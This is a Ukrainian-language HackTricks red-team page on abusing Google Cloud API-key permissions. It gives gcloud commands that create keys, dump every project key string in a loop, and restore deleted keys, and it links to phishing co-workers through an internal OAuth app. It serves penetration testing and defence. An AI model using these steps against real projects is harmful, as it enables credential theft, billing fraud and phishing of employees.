GCP - Apikeys Privesc

Reading time: 4 minutes

tip

Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Вивчайте та практикуйте Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Підтримка HackTricks

Apikeys

Наступні дозволи корисні для створення та викрадення API ключів, зверніть увагу на це з документації: API ключ - це простий зашифрований рядок, який ідентифікує додаток без будь-якого принципала. Вони корисні для доступу до публічних даних анонімно і використовуються для асоціювання запитів API з вашим проектом для квоти та білінгу.

Отже, з API ключем ви можете змусити компанію платити за ваше використання API, але ви не зможете підвищити привілеї.

Для отримання додаткової інформації про API ключі перегляньте:

GCP - API Keys Enum

Для інших способів створення API ключів перегляньте:

GCP - Serviceusage Privesc

Brute Force API Key access

Оскільки ви, можливо, не знаєте, які API активовані в проекті або які обмеження застосовані до знайденого API ключа, було б цікаво запустити інструмент https://github.com/ozguralp/gmapsapiscanner і перевірити до чого ви можете отримати доступ з API ключем.

apikeys.keys.create

Цей дозвіл дозволяє створити API ключ:

bash
gcloud services api-keys create
Operation [operations/akmf.p7-[...]9] complete. Result: {
"@type":"type.googleapis.com/google.api.apikeys.v2.Key",
"createTime":"2022-01-26T12:23:06.281029Z",
"etag":"W/\"HOhA[...]==\"",
"keyString":"AIzaSy[...]oU",
"name":"projects/5[...]6/locations/global/keys/f707[...]e8",
"uid":"f707[...]e8",
"updateTime":"2022-01-26T12:23:06.378442Z"
}

Ви можете знайти скрипт для автоматизації створення, експлуатації та очищення вразливого середовища тут.

caution

Зверніть увагу, що за замовчуванням користувачі мають дозволи на створення нових проектів і їм надається роль Власника над новим проектом. Тому користувач може cтворити проект і API ключ всередині цього проекту.

apikeys.keys.getKeyString , apikeys.keys.list

Ці дозволи дозволяють переглядати та отримувати всі apiKeys і отримувати Ключ:

bash
for  key  in  $(gcloud services api-keys list --uri); do
gcloud services api-keys get-key-string "$key"
done

Ви можете знайти скрипт для автоматизації створення, експлуатації та очищення вразливого середовища тут.

apikeys.keys.undelete , apikeys.keys.list

Ці дозволи дозволяють вам переглядати та відновлювати видалені ключі API. Ключ API надається у виході після завершення відновлення:

bash
gcloud services api-keys list --show-deleted
gcloud services api-keys undelete <key-uid>

Створіть внутрішній OAuth-додаток для фішингу інших працівників

Перегляньте наступну сторінку, щоб дізнатися, як це зробити, хоча ця дія належить до служби clientauthconfig згідно з документацією:

GWS - Google Platforms Phishing

tip

Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Вивчайте та практикуйте Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Підтримка HackTricks